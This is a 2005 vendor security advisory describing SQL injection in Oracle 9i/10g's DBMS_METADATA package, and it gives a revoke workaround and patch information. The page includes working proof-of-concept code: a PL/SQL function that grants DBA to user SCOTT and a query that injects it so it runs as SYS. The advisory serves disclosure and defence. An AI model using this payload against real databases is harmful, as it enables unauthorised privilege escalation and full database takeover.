Services
Information
Company |
SQL Injection via Oracle DBMS_METADATA in Oracle 9i / 10g
Details The following proof of concept exploit code injects a custom PLSQL function. This function is executed in the SYS context and grants the DBA permission to the user SCOTT. Workarounds REVOKE EXECUTE ON SYS.DBMS_METADATA FROM PUBLIC FORCE; Example -- Create a function first and inject this function. The function will be executed as user SYS. CREATE OR REPLACE FUNCTION "SCOTT"."ATTACK_FUNC" return varchar2 authid current_user as pragma autonomous_transaction; BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT'; COMMIT; RETURN ''; END; / -- Inject the function in the vulnerable procedure SELECT SYS.DBMS_METADATA.GET_DDL('''||SCOTT.ATTACK_FUNC()||''','') FROM dual; Patch Information Revoke the grants or apply the patches mentioned in Oracle Critical Patch Update April 2005. © 2005 by Red-Database-Security GmbH - last update 02-nov-2005 |
Definition Exploit |